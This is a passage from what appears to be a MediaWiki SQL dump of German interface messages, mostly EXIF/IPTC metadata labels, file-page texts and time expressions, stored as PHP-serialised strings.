$1\";'),('de','messages:show-big-image','s:13:\"Originaldatei\";'),('de','messages:show-big-image-preview','s:28:\"Größe dieser Vorschau: $1.\";'),('de','messages:show-big-image-other','s:50:\"Weitere {{PLURAL:$2|Auflösung|Auflösungen}}: $1.\";'),('de','messages:show-big-image-size','s:14:\"$1 × $2 Pixel\";'),('de','messages:file-info-gif-looped','s:14:\"Endlosschleife\";'),('de','messages:file-info-gif-frames','s:28:\"$1 {{PLURAL:$1|Bild|Bilder}}\";'),('de','messages:file-info-png-looped','s:14:\"Endlosschleife\";'),('de','messages:file-info-png-repeat','s:31:\"$1-{{PLURAL:$1|mal}} abgespielt\";'),('de','messages:file-info-png-frames','s:28:\"$1 {{PLURAL:$1|Bild|Bilder}}\";'),('de','messages:file-no-thumb-animation','s:102:\"\'\'\'Hinweis: Aufgrund technischer Beschränkungen werden Vorschaubilder dieser Datei nicht animiert.\'\'\'\";'),('de','messages:file-no-thumb-animation-gif','s:129:\"\'\'\'Hinweis: Aufgrund technischer Beschränkungen werden Vorschaubilder hochauflösender GIF-Dateien wie dieser nicht animiert.\'\'\'\";'),('de','messages:newimages','s:12:\"Neue Dateien\";'),('de','messages:imagelisttext','s:74:\"Hier ist eine Liste von \'\'\'$1\'\'\' {{PLURAL:$1|Datei|Dateien}}, sortiert $2.\";'),('de','messages:newimages-summary','s:62:\"Diese Spezialseite zeigt die zuletzt hochgeladenen Dateien an.\";'),('de','messages:newimages-legend','s:6:\"Filter\";'),('de','messages:newimages-label','s:32:\"Dateiname (oder ein Teil davon):\";'),('de','messages:newimages-showbots','s:25:\"Uploads von Bots anzeigen\";'),('de','messages:noimages','s:23:\"Keine Dateien gefunden.\";'),('de','messages:ilsubmit','s:6:\"Suchen\";'),('de','messages:bydate','s:10:\"nach Datum\";'),('de','messages:sp-newimages-showfrom','s:32:\"Zeige neue Dateien ab $1, $2 Uhr\";'),('de','messages:seconds','s:36:\"{{PLURAL:$1|$1 Sekunde|$1 Sekunden}}\";'),('de','messages:minutes','s:34:\"{{PLURAL:$1|$1 Minute|$1 Minuten}}\";'),('de','messages:hours','s:33:\"{{PLURAL:$1|1 Stunde|$1 Stunden}}\";'),('de','messages:days','s:28:\"{{PLURAL:$1|$1 Tag|$1 Tage}}\";'),('de','messages:weeks','s:32:\"{{PLURAL:$1|$1 Woche|$1 Wochen}}\";'),('de','messages:months','s:31:\"{{PLURAL:$1|1 Monat|$1 Monate}}\";'),('de','messages:years','s:29:\"{{PLURAL:$1|1 Jahr|$1 Jahre}}\";'),('de','messages:ago','s:6:\"vor $1\";'),('de','messages:just-now','s:11:\"gerade eben\";'),('de','messages:hours-ago','s:41:\"vor {{PLURAL:$1|einer Stunde|$1 Stunden}}\";'),('de','messages:minutes-ago','s:41:\"vor {{PLURAL:$1|einer Minute|$1 Minuten}}\";'),('de','messages:seconds-ago','s:43:\"vor {{PLURAL:$1|einer Sekunde|$1 Sekunden}}\";'),('de','messages:monday-at','s:12:\"Montag um $1\";'),('de','messages:tuesday-at','s:14:\"Dienstag um $1\";'),('de','messages:wednesday-at','s:14:\"Mittwoch um $1\";'),('de','messages:thursday-at','s:16:\"Donnerstag um $1\";'),('de','messages:friday-at','s:13:\"Freitag um $1\";'),('de','messages:saturday-at','s:13:\"Samstag um $1\";'),('de','messages:sunday-at','s:13:\"Sonntag um $1\";'),('de','messages:yesterday-at','s:13:\"Gestern um $1\";'),('de','messages:bad_image_list','s:261:\"Format:\n\nNur Zeilen, die mit einem * anfangen, werden ausgewertet. Als erstes nach dem * muss ein Link auf eine unerwünschte Datei stehen.\nDarauf folgende Seitenlinks in derselben Zeile definieren Ausnahmen, in deren Kontext die Datei trotzdem erscheinen darf.\";'),('de','messages:metadata','s:9:\"Metadaten\";'),('de','messages:metadata-help','s:218:\"Diese Datei enthält weitere Informationen, die in der Regel von der Digitalkamera oder dem verwendeten Scanner stammen. Durch nachträgliche Bearbeitung der Originaldatei können einige Details verändert worden sein.\";'),('de','messages:metadata-expand','s:29:\"Erweiterte Details einblenden\";'),('de','messages:metadata-collapse','s:29:\"Erweiterte Details ausblenden\";'),('de','messages:metadata-fields','s:394:\"Die folgenden Felder der EXIF-Metadaten, die in diesem MediaWiki-Systemtext angegeben sind, werden auf Bildbeschreibungsseiten mit eingeklappter Metadatentabelle angezeigt.\nWeitere werden standardmäßig nicht angezeigt.\n* make\n* model\n* datetimeoriginal\n* exposuretime\n* fnumber\n* isospeedratings\n* focallength\n* artist\n* copyright\n* imagedescription\n* gpslatitude\n* gpslongitude\n* gpsaltitude\";'),('de','messages:exif-imagewidth','s:6:\"Breite\";'),('de','messages:exif-imagelength','s:5:\"Höhe\";'),('de','messages:exif-bitspersample','s:23:\"Bits pro Farbkomponente\";'),('de','messages:exif-compression','s:19:\"Art der Kompression\";'),('de','messages:exif-photometricinterpretation','s:20:\"Pixelzusammensetzung\";'),('de','messages:exif-orientation','s:17:\"Kameraausrichtung\";'),('de','messages:exif-samplesperpixel','s:18:\"Anzahl Komponenten\";'),('de','messages:exif-planarconfiguration','s:16:\"Datenausrichtung\";'),('de','messages:exif-ycbcrsubsampling','s:28:\"Subsampling Rate von Y bis C\";'),('de','messages:exif-ycbcrpositioning','s:22:\"Y und C Positionierung\";'),('de','messages:exif-xresolution','s:22:\"Horizontale Auflösung\";'),('de','messages:exif-yresolution','s:20:\"Vertikale Auflösung\";'),('de','messages:exif-stripoffsets','s:17:\"Bilddaten-Versatz\";'),('de','messages:exif-rowsperstrip','s:26:\"Anzahl Zeilen pro Streifen\";'),('de','messages:exif-stripbytecounts','s:32:\"Bytes pro komprimiertem Streifen\";'),('de','messages:exif-jpeginterchangeformat','s:18:\"Offset zu JPEG SOI\";'),('de','messages:exif-jpeginterchangeformatlength','s:31:\"Größe der JPEG-Daten in Bytes\";'),('de','messages:exif-whitepoint','s:19:\"Manuell mit Messung\";'),('de','messages:exif-primarychromaticities','s:16:\"Primäre Farbart\";'),('de','messages:exif-ycbcrcoefficients','s:19:\"YCbCr-Koeffizienten\";'),('de','messages:exif-referenceblackwhite','s:28:\"Schwarz/Weiß-Referenzpunkte\";'),('de','messages:exif-datetime','s:17:\"Speicherzeitpunkt\";'),('de','messages:exif-imagedescription','s:9:\"Bildtitel\";'),('de','messages:exif-make','s:10:\"Hersteller\";'),('de','messages:exif-model','s:6:\"Modell\";'),('de','messages:exif-software','s:8:\"Software\";'),('de','messages:exif-artist','s:8:\"Fotograf\";'),('de','messages:exif-copyright','s:13:\"Urheberrechte\";'),('de','messages:exif-exifversion','s:12:\"Exif-Version\";'),('de','messages:exif-flashpixversion','s:30:\"unterstützte Flashpix-Version\";'),('de','messages:exif-colorspace','s:8:\"Farbraum\";'),('de','messages:exif-componentsconfiguration','s:31:\"Bedeutung einzelner Komponenten\";'),('de','messages:exif-compressedbitsperpixel','s:27:\"Komprimierte Bits pro Pixel\";'),('de','messages:exif-pixelydimension','s:10:\"Bildbreite\";'),('de','messages:exif-pixelxdimension','s:9:\"Bildhöhe\";'),('de','messages:exif-usercomment','s:18:\"Benutzerkommentare\";'),('de','messages:exif-relatedsoundfile','s:20:\"Zugehörige Tondatei\";'),('de','messages:exif-datetimeoriginal','s:19:\"Erfassungszeitpunkt\";'),('de','messages:exif-datetimedigitized','s:25:\"Digitalisierungszeitpunkt\";'),('de','messages:exif-subsectime','s:27:\"Speicherzeitpunkt (1/100 s)\";'),('de','messages:exif-subsectimeoriginal','s:29:\"Erfassungszeitpunkt (1/100 s)\";'),('de','messages:exif-subsectimedigitized','s:35:\"Digitalisierungszeitpunkt (1/100 s)\";'),('de','messages:exif-exposuretime','s:16:\"Belichtungsdauer\";'),('de','messages:exif-exposuretime-format','s:16:\"$1 Sekunden ($2)\";'),('de','messages:exif-fnumber','s:6:\"Blende\";'),('de','messages:exif-exposureprogram','s:19:\"Belichtungsprogramm\";'),('de','messages:exif-spectralsensitivity','s:20:\"Spectral Sensitivity\";'),('de','messages:exif-isospeedratings','s:38:\"Film- oder Sensorempfindlichkeit (ISO)\";'),('de','messages:exif-shutterspeedvalue','s:24:\"APEX-Belichtungszeitwert\";'),('de','messages:exif-aperturevalue','s:16:\"APEX-Blendenwert\";'),('de','messages:exif-brightnessvalue','s:20:\"APEX-Helligkeitswert\";'),('de','messages:exif-exposurebiasvalue','s:18:\"Belichtungsvorgabe\";'),('de','messages:exif-maxaperturevalue','s:15:\"Größte Blende\";'),('de','messages:exif-subjectdistance','s:10:\"Entfernung\";'),('de','messages:exif-meteringmode','s:13:\"Messverfahren\";'),('de','messages:exif-lightsource','s:11:\"Lichtquelle\";'),('de','messages:exif-flash','s:5:\"Blitz\";'),('de','messages:exif-focallength','s:10:\"Brennweite\";'),('de','messages:exif-subjectarea','s:7:\"Bereich\";'),('de','messages:exif-flashenergy','s:12:\"Blitzstärke\";'),('de','messages:exif-focalplanexresolution','s:27:\"Sensorauflösung horizontal\";'),('de','messages:exif-focalplaneyresolution','s:25:\"Sensorauflösung vertikal\";'),('de','messages:exif-focalplaneresolutionunit','s:28:\"Einheit der Sensorauflösung\";'),('de','messages:exif-subjectlocation','s:13:\"Motivstandort\";'),('de','messages:exif-exposureindex','s:16:\"Belichtungsindex\";'),('de','messages:exif-sensingmethod','s:11:\"Messmethode\";'),('de','messages:exif-filesource','s:16:\"Quelle der Datei\";'),('de','messages:exif-scenetype','s:9:\"Szenentyp\";'),('de','messages:exif-customrendered','s:35:\"Benutzerdefinierte Bildverarbeitung\";'),('de','messages:exif-exposuremode','s:16:\"Belichtungsmodus\";'),('de','messages:exif-whitebalance','s:13:\"Weißabgleich\";'),('de','messages:exif-digitalzoomratio','s:11:\"Digitalzoom\";'),('de','messages:exif-focallengthin35mmfilm','s:33:\"Brennweite (Kleinbildäquivalent)\";'),('de','messages:exif-scenecapturetype','s:11:\"Aufnahmeart\";'),('de','messages:exif-gaincontrol','s:12:\"Verstärkung\";'),('de','messages:exif-contrast','s:8:\"Kontrast\";'),('de','messages:exif-saturation','s:10:\"Sättigung\";'),('de','messages:exif-sharpness','s:8:\"Schärfe\";'),('de','messages:exif-devicesettingdescription','s:18:\"Geräteeinstellung\";'),('de','messages:exif-subjectdistancerange','s:15:\"Motiventfernung\";'),('de','messages:exif-imageuniqueid','s:7:\"Bild-ID\";'),('de','messages:exif-gpsversionid','s:15:\"GPS-Tag-Version\";'),('de','messages:exif-gpslatituderef','s:26:\"nördl. oder südl. Breite\";'),('de','messages:exif-gpslatitude','s:19:\"Geografische Breite\";'),('de','messages:exif-gpslongituderef','s:25:\"östl. oder westl. Länge\";'),('de','messages:exif-gpslongitude','s:19:\"Geografische Länge\";'),('de','messages:exif-gpsaltituderef','s:11:\"Bezugshöhe\";'),('de','messages:exif-gpsaltitude','s:5:\"Höhe\";'),('de','messages:exif-gpstimestamp','s:8:\"GPS-Zeit\";'),('de','messages:exif-gpssatellites','s:36:\"Für die Messung benutzte Satelliten\";'),('de','messages:exif-gpsstatus','s:16:\"Empfängerstatus\";'),('de','messages:exif-gpsmeasuremode','s:13:\"Messverfahren\";'),('de','messages:exif-gpsdop','s:15:\"Messgenauigkeit\";'),('de','messages:exif-gpsspeedref','s:23:\"Geschwindigkeitseinheit\";'),('de','messages:exif-gpsspeed','s:35:\"Geschwindigkeit des GPS-Empfängers\";'),('de','messages:exif-gpstrackref','s:31:\"Referenz für Bewegungsrichtung\";'),('de','messages:exif-gpstrack','s:17:\"Bewegungsrichtung\";'),('de','messages:exif-gpsimgdirectionref','s:40:\"Referenz für die Ausrichtung des Bildes\";'),('de','messages:exif-gpsimgdirection','s:12:\"Bildrichtung\";'),('de','messages:exif-gpsmapdatum','s:28:\"Geodätisches Referenzsystem\";'),('de','messages:exif-gpsdestlatituderef','s:24:\"Referenz für die Breite\";'),('de','messages:exif-gpsdestlatitude','s:29:\"Geografische Breite Zielpunkt\";'),('de','messages:exif-gpsdestlongituderef','s:24:\"Referenz für die Länge\";'),('de','messages:exif-gpsdestlongitude','s:29:\"Geografische Länge Zielpunkt\";'),('de','messages:exif-gpsdestbearingref','s:27:\"Referenz für Motivrichtung\";'),('de','messages:exif-gpsdestbearing','s:13:\"Motivrichtung\";'),('de','messages:exif-gpsdestdistanceref','s:33:\"Referenz für die Motiventfernung\";'),('de','messages:exif-gpsdestdistance','s:15:\"Motiventfernung\";'),('de','messages:exif-gpsprocessingmethod','s:23:\"Name des GPS-Verfahrens\";'),('de','messages:exif-gpsareainformation','s:21:\"Name des GPS-Gebietes\";'),('de','messages:exif-gpsdatestamp','s:9:\"GPS-Datum\";'),('de','messages:exif-gpsdifferential','s:25:\"GPS-Differentialkorrektur\";'),('de','messages:exif-jpegfilecomment','s:19:\"JPEG-Dateikommentar\";'),('de','messages:exif-keywords','s:12:\"Stichwörter\";'),('de','messages:exif-worldregioncreated','s:44:\"Weltregion in der das Foto aufgenommen wurde\";'),('de','messages:exif-countrycreated','s:39:\"Staat in dem das Foto aufgenommen wurde\";'),('de','messages:exif-countrycodecreated','s:53:\"Code für den Staat in dem das Foto aufgenommen wurde\";'),('de','messages:exif-provinceorstatecreated','s:57:\"Provinz oder Gliedstaat in dem das Foto aufgenommen wurde\";'),('de','messages:exif-citycreated','s:39:\"Stadt in der das Foto aufgenommen wurde\";'),('de','messages:exif-sublocationcreated','s:51:\"Bereich der Stadt in der das Foto aufgenommen wurde\";'),('de','messages:exif-worldregiondest','s:21:\"Gezeigte Weltregionen\";'),('de','messages:exif-countrydest','s:15:\"Gezeigter Staat\";'),('de','messages:exif-countrycodedest','s:29:\"Code für den gezeigten Staat\";'),('de','messages:exif-provinceorstatedest','s:44:\"Gezeigte Provinz oder angezeigter Gliedstaat\";'),('de','messages:exif-citydest','s:14:\"Gezeigte Stadt\";'),('de','messages:exif-sublocationdest','s:27:\"Bereich der gezeigten Stadt\";'),('de','messages:exif-objectname','s:9:\"Kurztitel\";'),('de','messages:exif-specialinstructions','s:21:\"Besondere Anweisungen\";'),('de','messages:exif-headline','s:5:\"Titel\";'),('de','messages:exif-credit','s:30:\"Namensnennung/Veröffentlicher\";'),('de','messages:exif-source','s:6:\"Quelle\";'),('de','messages:exif-editstatus','s:31:\"Redaktioneller Status des Fotos\";'),('de','messages:exif-urgency','s:13:\"Dringlichkeit\";'),('de','messages:exif-fixtureidentifier','s:7:\"Kolumne\";'),('de','messages:exif-locationdest','s:22:\"Dargestellter Standort\";'),('de','messages:exif-locationdestcode','s:36:\"Code für den dargestellten Standort\";'),('de','messages:exif-objectcycle','s:83:\"Veröffentlichungszeitraum während eines Tages für den dieses Medium bestimmt ist\";'),('de','messages:exif-contact','s:20:\"Kontaktinformationen\";'),('de','messages:exif-writer','s:9:\"Verfasser\";'),('de','messages:exif-languagecode','s:7:\"Sprache\";'),('de','messages:exif-iimversion','s:11:\"IIM-Version\";'),('de','messages:exif-iimcategory','s:9:\"Kategorie\";'),('de','messages:exif-iimsupplementalcategory','s:23:\"Zusätzliche Kategorien\";'),('de','messages:exif-datetimeexpires','s:20:\"Nicht verwenden nach\";'),('de','messages:exif-datetimereleased','s:18:\"Veröffentlicht am\";'),('de','messages:exif-originaltransmissionref','s:54:\"Code des Standorts von dem das Foto übermittelt wurde\";'),('de','messages:exif-identifier','s:7:\"Kennung\";'),('de','messages:exif-lens','s:20:\"Verwendetes Objektiv\";'),('de','messages:exif-serialnumber','s:23:\"Seriennummer der Kamera\";'),('de','messages:exif-cameraownername','s:14:\"Kamerabesitzer\";'),('de','messages:exif-label','s:11:\"Bezeichnung\";'),('de','messages:exif-datetimemetadata','s:54:\"Datum zu dem die Metadaten letztmalig geändert wurden\";'),('de','messages:exif-nickname','s:30:\"Gebräuchlicher Name des Fotos\";'),('de','messages:exif-rating','s:17:\"Bewertung (aus 5)\";'),('de','messages:exif-rightscertificate','s:27:\"Rechteverwaltungszertifikat\";'),('de','messages:exif-copyrighted','s:19:\"Urheberrechtsstatus\";'),('de','messages:exif-copyrightowner','s:20:\"Urheberrechtsinhaber\";'),('de','messages:exif-usageterms','s:19:\"Nutzungsbedingungen\";'),('de','messages:exif-webstatement','s:26:\"Online-Urheberrechtsangabe\";'),('de','messages:exif-originaldocumentid','s:48:\"Eindeutige Kennung des ursprünglichen Dokuments\";'),('de','messages:exif-licenseurl','s:36:\"URL der Urheberrechtsangabe (Lizenz)\";'),('de','messages:exif-morepermissionsurl','s:31:\"Alternative Lizenzinformationen\";'),('de','messages:exif-attributionurl','s:55:\"Bei Weiterverwendung dieses Werks, bitte verlinken auf:\";'),('de','messages:exif-preferredattributionname','s:50:\"Bei Weiterverwendung dieses Werks, bitte benennen:\";'),('de','messages:exif-pngfilecomment','s:18:\"PNG-Dateikommentar\";'),('de','messages:exif-disclaimer','s:18:\"Haftungsausschluss\";'),('de','messages:exif-contentwarning','s:14:\"Inhaltswarnung\";'),('de','messages:exif-giffilecomment','s:18:\"GIF-Dateikommentar\";'),('de','messages:exif-intellectualgenre','s:15:\"Art des Mediums\";'),('de','messages:exif-subjectnewscode','s:10:\"Themencode\";'),('de','messages:exif-scenecode','s:16:\"IPTC-Ansichtcode\";'),('de','messages:exif-event','s:22:\"Dargestelltes Ereignis\";'),('de','messages:exif-organisationinimage','s:25:\"Dargestellte Organisation\";'),('de','messages:exif-personinimage','s:19:\"Dargestellte Person\";'),('de','messages:exif-originalimageheight','s:29:\"Bildhöhe vor dem Zuschneiden\";'),('de','messages:exif-originalimagewidth','s:30:\"Bildbreite vor dem Zuschneiden\";'),('de','messages:exif-compression-1','s:13:\"Unkomprimiert\";'),('de','messages:exif-compression-2','s:71:\"CCITT Gruppe 3 1-dimensionale modifizierte Huffman-Lauflängenkodierung\";'),('de','messages:exif-compression-3','s:27:\"CCITT Gruppe 3 Faxcodierung\";'),('de','messages:exif-compression-4','s:27:\"CCITT Gruppe 4 Faxcodierung\";'),('de','messages:exif-copyrighted-true','s:10:\"Geschützt\";'),('de','messages:exif-copyrighted-false','s:36:\"Urheberrechtsstatus nicht festgelegt\";'),('de','messages:exif-unknowndate','s:17:\"Unbekanntes Datum\";'),('de','messages:exif-orientation-1','s:6:\"Normal\";'),('de','messages:exif-orientation-2','s:21:\"Horizontal gespiegelt\";'),('de','messages:exif-orientation-3','s:16:\"Um 180° gedreht\";'),('de','messages:exif-orientation-4','s:19:\"Vertikal gespiegelt\";'),('de','messages:exif-orientation-5','s:66:\"Entgegen dem Uhrzeigersinn um 90° gedreht und vertikal gespiegelt\";'),('de','messages:exif-orientation-6','s:42:\"Um 90° entgegen dem Uhrzeigersinn gedreht\";'),('de','messages:exif-orientation-7','s:56:\"Um 90° im Uhrzeigersinn gedreht und vertikal gespiegelt\";'),('de','messages:exif-orientation-8','s:32:\"Um 90° im Uhrzeigersinn gedreht\";'),('de','messages:exif-planarconfiguration-1','s:10:\"Grobformat\";'),('de','messages:exif-planarconfiguration-2','s:12:\"Planarformat\";'),('de','messages:exif-colorspace-65535','s:16:\"Nicht kalibriert\";'),('de','messages:exif-componentsconfiguration-0','s:15:\"Existiert nicht\";'),('de','messages:exif-exposureprogram-0','s:9:\"Unbekannt\";'),('de','messages:exif-exposureprogram-1','s:7:\"Manuell\";'),('de','messages:exif-exposureprogram-2','s:16:\"Standardprogramm\";'),('de','messages:exif-exposureprogram-3','s:13:\"Zeitautomatik\";'),('de','messages:exif-exposureprogram-4','s:16:\"Blendenautomatik\";'),('de','messages:exif-exposureprogram-5','s:52:\"Kreativprogramm mit Bevorzugung hoher Schärfentiefe\";'),('de','messages:exif-exposureprogram-6','s:60:\"Action-Programm mit Bevorzugung einer kurzen Belichtungszeit\";'),('de','messages:exif-exposureprogram-7','s:17:\"Portrait-Programm\";'),('de','messages:exif-exposureprogram-8','s:20:\"Landschaftsaufnahmen\";'),('de','messages:exif-subjectdistance-value','s:8:\"$1 Meter\";'),('de','messages:exif-meteringmode-0','s:9:\"Unbekannt\";'),('de','messages:exif-meteringmode-1','s:16:\"Durchschnittlich\";'),('de','messages:exif-meteringmode-2','s:15:\"Mittenzentriert\";'),('de','messages:exif-meteringmode-3','s:11:\"Spotmessung\";'),('de','messages:exif-meteringmode-4','s:19:\"Mehrfachspotmessung\";'),('de','messages:exif-meteringmode-5','s:6:\"Muster\";'),('de','messages:exif-meteringmode-6','s:8:\"Bildteil\";'),('de','messages:exif-meteringmode-255','s:9:\"Unbekannt\";'),('de','messages:exif-lightsource-0','s:9:\"Unbekannt\";'),('de','messages:exif-lightsource-1','s:10:\"Tageslicht\";'),('de','messages:exif-lightsource-2','s:14:\"Fluoreszierend\";'),('de','messages:exif-lightsource-3','s:10:\"Glühlampe\";'),('de','messages:exif-lightsource-4','s:5:\"Blitz\";'),('de','messages:exif-lightsource-9','s:15:\"Schönes Wetter\";'),('de','messages:exif-lightsource-10','s:8:\"Bewölkt\";'),('de','messages:exif-lightsource-11','s:8:\"Schatten\";'),('de','messages:exif-lightsource-12','s:43:\"Tageslicht fluoreszierend (D 5700–7100 K)\";'),('de','messages:exif-lightsource-13','s:43:\"Tagesweiß fluoreszierend (N 4600–5400 K)\";'),('de','messages:exif-lightsource-14','s:42:\"Kaltweiß fluoreszierend (W 3900–4500 K)\";'),('de','messages:exif-lightsource-15','s:39:\"Weiß fluoreszierend (WW 3200–3700 K)\";'),('de','messages:exif-lightsource-17','s:15:\"Standardlicht A\";'),('de','messages:exif-lightsource-18','s:15:\"Standardlicht B\";'),('de','messages:exif-lightsource-19','s:15:\"Standardlicht C\";'),('de','messages:exif-lightsource-24','s:21:\"ISO Studio Kunstlicht\";'),('de','messages:exif-lightsource-255','s:18:\"Andere Lichtquelle\";'),('de','messages:exif-flash-fired-0','s:10:\"kein Blitz\";'),('de','messages:exif-flash-fired-1','s:16:\"Blitz ausgelöst\";'),('de','messages:exif-flash-return-0','s:24:\"Blitz sendet keine Daten\";'),('de','messages:exif-flash-return-2','s:38:\"keine Reflexion des Blitz festgestellt\";'),('de','messages:exif-flash-return-3','s:32:\"Reflexion des Blitz festgestellt\";'),('de','messages:exif-flash-mode-1','s:19:\"erzwungenes Blitzen\";'),('de','messages:exif-flash-mode-2','s:18:\"Blitz abgeschaltet\";'),('de','messages:exif-flash-mode-3','s:9:\"Automatik\";'),('de','messages:exif-flash-function-1','s:19:\"Keine Blitzfunktion\";'),('de','messages:exif-flash-redeye-1','s:18:\"Rotaugen Reduktion\";'),('de','messages:exif-focalplaneresolutionunit-2','s:4:\"Zoll\";'),('de','messages:exif-sensingmethod-1','s:15:\"Nicht angegeben\";'),('de','messages:exif-sensingmethod-2','s:19:\"Ein-Chip-Farbsensor\";'),('de','messages:exif-sensingmethod-3','s:20:\"Zwei-Chip-Farbsensor\";'),('de','messages:exif-sensingmethod-4','s:20:\"Drei-Chip-Farbsensor\";'),('de','messages:exif-sensingmethod-5','s:27:\"Farbraum sequentiell Sensor\";'),('de','messages:exif-sensingmethod-7','s:18:\"Trilinearer Sensor\";'),('de','messages:exif-sensingmethod-8','s:36:\"Farbraum linear sequentieller Sensor\";'),('de','messages:exif-filesource-3','s:24:\"Digitale Standbildkamera\";'),('de','messages:exif-scenetype-1','s:6:\"Normal\";'),('de','messages:exif-customrendered-0','s:8:\"Standard\";'),('de','messages:exif-customrendered-1','s:17:\"Benutzerdefiniert\";'),('de','messages:exif-exposuremode-0','s:23:\"Automatische Belichtung\";'),('de','messages:exif-exposuremode-1','s:19:\"Manuelle Belichtung\";'),('de','messages:exif-exposuremode-2','s:16:\"Belichtungsreihe\";'),('de','messages:exif-whitebalance-0','s:11:\"Automatisch\";'),('de','messages:exif-whitebalance-1','s:7:\"Manuell\";'),('de','messages:exif-scenecapturetype-0','s:8:\"Standard\";'),('de','messages:exif-scenecapturetype-1','s:10:\"Landschaft\";'),('de','messages:exif-scenecapturetype-2','s:8:\"Portrait\";'),('de','messages:exif-scenecapturetype-3','s:10:\"Nachtszene\";'),('de','messages:exif-gaincontrol-0','s:5:\"Keine\";'),('de','messages:exif-gaincontrol-1','s:6:\"Gering\";'),('de','messages:exif-gaincontrol-2','s:12:\"High gain up\";'),('de','messages:exif-gaincontrol-3','s:13:\"Low gain down\";'),('de','messages:exif-gaincontrol-4','s:14:\"High gain down\";'),('de','messages:exif-contrast-0','s:6:\"Normal\";'),('de','messages:exif-contrast-1','s:7:\"Schwach\";'),('de','messages:exif-contrast-2','s:5:\"Stark\";'),('de','messages:exif-saturation-0','s:6:\"Normal\";'),('de','messages:exif-saturation-1','s:6:\"Gering\";'),('de','messages:exif-saturation-2','s:4:\"Hoch\";'),('de','messages:exif-sharpness-0','s:6:\"Normal\";'),('de','messages:exif-sharpness-1','s:6:\"Gering\";'),('de','messages:exif-sharpness-2','s:5:\"Stark\";'),('de','messages:exif-subjectdistancerange-0','s:9:\"Unbekannt\";'),('de','messages:exif-subjectdistancerange-1','s:5:\"Makro\";'),('de','messages:exif-subjectdistancerange-2','s:3:\"Nah\";'),('de','messages:exif-subjectdistancerange-3','s:8:\"Entfernt\";'),('de','messages:exif-gpslatitude-n','s:14:\"nördl. Breite\";'),('de','messages:exif-gpslatitude-s','s:13:\"südl. Breite\";'),('de','messages:exif-gpslongitude-e','s:13:\"östl. Länge\";'),('de','messages:exif-gpslongitude-w','s:13:\"westl. Länge\";'),('de','messages:exif-gpsaltitude-above-sealevel','s:46:\"$1 {{PLURAL:$1|Meter}} über dem Meeresspiegel\";'),('de','messages:exif-gpsaltitude-below-sealevel','s:46:\"$1 {{PLURAL:$1|Meter}} unter dem Meeresspiegel\";'),('de','messages:exif-gpsstatus-a','s:14:\"Messung läuft\";'),('de','messages:exif-gpsstatus-v','s:32:\"Interoperabilität von Messungen\";'),('de','messages:exif-gpsmeasuremode-2','s:22:\"2-dimensionale Messung\";'),('de','messages:exif-gpsmeasuremode-3','s:22:\"3-dimensionale Messung\";'),('de','messages:exif-gpsspeed-k','s:4:\"km/h\";'),('de','messages:exif-gpsspeed-m','s:3:\"mph\";'),('de','messages:exif-gpsspeed-n','s:6:\"Knoten\";'),('de','messages:exif-gpsdestdistance-k','s:9:\"Kilometer\";'),('de','messages:exif-gpsdestdistance-m','s:6:\"Meilen\";'),('de','messages:exif-gpsdestdistance-n','s:16:\"Nautische Meilen\";'),('de','messages:exif-gpsdop-excellent','s:18:\"Ausgezeichnet ($1)\";'),('de','messages:exif-gpsdop-good','s:8:\"Gut ($1)\";'),('de','messages:exif-gpsdop-moderate','s:11:\"Mittel ($1)\";'),('de','messages:exif-gpsdop-fair','s:15:\"Akzeptabel ($1)\";'),('de','messages:exif-gpsdop-poor','s:12:\"Schwach ($1)\";'),('de','messages:exif-objectcycle-a','s:11:\"Nur morgens\";'),('de','messages:exif-objectcycle-p','s:10:\"Nur abends\";'),('de','messages:exif-objectcycle-b','s:25:\"Sowohl morgens und abends\";'),('de','messages:exif-gpsdirection-t','s:22:\"Tatsächliche Richtung\";'),('de','messages:exif-gpsdirection-m','s:20:\"Magnetische Richtung\";'),('de','messages:exif-ycbcrpositioning-1','s:9:\"Zentriert\";'),('de','messages:exif-ycbcrpositioning-2','s:10:\"Benachbart\";'),('de','messages:exif-dc-contributor','s:10:\"Beteiligte\";'),('de','messages:exif-dc-coverage','s:45:\"Örtlicher oder zeitlicher Rahmen des Mediums\";'),('de','messages:exif-dc-date','s:13:\"Datumsangaben\";'),('de','messages:exif-dc-publisher','s:16:\"Veröffentlicher\";'),('de','messages:exif-dc-relation','s:16:\"Ähnliche Medien\";'),('de','messages:exif-dc-rights','s:6:\"Rechte\";'),('de','messages:exif-dc-source','s:14:\"Medienherkunft\";'),('de','messages:exif-dc-type','s:9:\"Medientyp\";'),('de','messages:exif-rating-rejected','s:9:\"Abgelehnt\";'),('de','messages:exif-isospeedratings-overflow','s:18:\"Größer als 65535\";'),('de','messages:exif-iimcategory-ace','s:30:\"Kunst, Kultur und Unterhaltung\";'),('de','messages:exif-iimcategory-clj','s:23:\"Kriminalität und Recht\";'),('de','messages:exif-iimcategory-dis','s:25:\"Katastrophen und Unfälle\";'),('de','messages:exif-iimcategory-fin','s:25:\"Wirtschaft und Geschäfte\";'),('de','messages:exif-iimcategory-edu','s:7:\"Bildung\";'),('de','messages:exif-iimcategory-evn','s:6:\"Umwelt\";'),('de','messages:exif-iimcategory-hth','s:10:\"Gesundheit\";'),('de','messages:exif-iimcategory-hum','s:17:\"Interessensgebiet\";'),('de','messages:exif-iimcategory-lab','s:6:\"Arbeit\";'),('de','messages:exif-iimcategory-lif','s:22:\"Lifestyle und Freizeit\";'),('de','messages:exif-iimcategory-pol','s:7:\"Politik\";'),('de','messages:exif-iimcategory-rel','s:19:\"Religion und Glaube\";'),('de','messages:exif-iimcategory-sci','s:28:\"Wissenschaft und Technologie\";'),('de','messages:exif-iimcategory-soi','s:14:\"Soziale Themen\";'),('de','messages:exif-iimcategory-spo','s:5:\"Sport\";'),('de','messages:exif-iimcategory-war','s:28:\"Krieg, Konflikte und Unruhen\";'),('de','messages:exif-iimcategory-wea','s:6:\"Wetter\";'),('de','messages:exif-urgency-normal','s:11:\"Normal ($1)\";'),('de','messages:exif-urgency-low','s:12:\"Niedrig ($1)\";'),('de','messages:exif-urgency-high','s:9:\"Hoch ($1)\";'),('de','messages:exif-urgency-other','s:34:\"Benutzerdefinierte Priorität ($1)\";'),('de','messages:watchlistall2','s:4:\"alle\";'),('de','messages:namespacesall','s:4:\"alle\";'),('de','messages:monthsall','s:4:\"alle\";'),('de','messages:confirmemail','s:46:\"E-Mail-Adresse bestätigen (Authentifizierung)\";'),('de','messages:confirmemail_noemail','s:112:\"Du hast keine gültige E-Mail-Adresse in deinen [[Special:Preferences|persönlichen Einstellungen]] eingetragen.\";'),('de','messages:confirmemail_text','s:529:\"{{SITENAME}} erfordert, dass du deine E-Mail-Adresse bestätigst (authentifizieren), bevor du die erweiterten 